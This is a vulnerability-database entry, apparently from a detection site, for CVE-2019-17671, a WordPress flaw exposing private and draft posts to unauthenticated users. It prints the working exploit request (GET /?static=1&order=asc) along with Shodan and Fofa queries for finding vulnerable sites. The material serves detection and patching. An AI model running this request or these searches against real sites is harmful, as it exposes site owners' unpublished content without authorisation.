🔙 목록으로 돌아가기

CVE-2019-17671: WordPress <= 5.2.4 - Unauthenticated View Private/Draft Posts

TitleWordPress <= 5.2.4 - Unauthenticated View Private/Draft Posts
Author0x_Akoko
SeverityMedium
ImpactUnauthenticated users can view restricted content, leading to information disclosure.
RemediationUpdate to WordPress 5.2.4 or later.
CVSS Score5.3
EPSS Score0.82836
CVE IDCVE-2019-17671
CWE IDCWE-200
Shodan Queryhttp.component:"wordpress" http.html:"status-draft"
Fofa Querybody="Wordpress" && body="status-draft"
Tags cve cve2019 wp wordpress unauth disclosure

🔍 Vulnerability Description

WordPress before 5.2.4 contains an information disclosure caused by mishandling of the static query property, letting unauthenticated users view certain content, exploit requires no authentication.

🌐 HTTP Request

GET /?static=1&order=asc HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/11.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-17671.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-17671.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A